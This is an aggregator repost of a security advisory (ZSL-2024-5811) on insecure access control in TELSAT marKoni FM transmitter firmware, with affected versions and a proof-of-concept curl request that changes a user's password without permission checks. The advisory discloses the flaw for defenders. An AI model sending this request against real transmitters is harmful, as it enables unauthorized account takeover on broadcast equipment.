2
[remote] TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Pa...
source link: https://www.exploit-db.com/exploits/51908
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Password
TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password
Vendor: TELSAT Srl
Product web page: https://www.markoni.it
Affected version: Markoni-D (Compact) FM Transmitters
Markoni-DH (Exciter+Amplifiers) FM Transmitters
Markoni-A (Analogue Modulator) FM Transmitters
Firmware: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9
Summary: Professional FM transmitters.
Desc: Unauthorized user could exploit this vulnerability to change
his/her password, potentially gaining unauthorized access to sensitive
information or performing actions beyond her/his designated permissions.
Tested on: GNU/Linux 3.10.53 (armv7l)
icorem6solox
lighttpd/1.4.33
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2024-5811
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php
10.11.2023
--
PoC request of a user changing his own password.
Only admin can edit users. No permissions or Cookie check.
$ curl -s -H "Cookie: name=user-1702119917" \
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t
HTTP/1.1 200 OK
Content-type: text/html
Cache-control: no-cache
Set-Cookie: name=user-1702119917; max-age=315360000
Transfer-Encoding: chunked
Date: Sat, 9 Dec 2023 11:05:17 GMT
Server: lighttpd/1.4.33
oc=4&resp=0
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK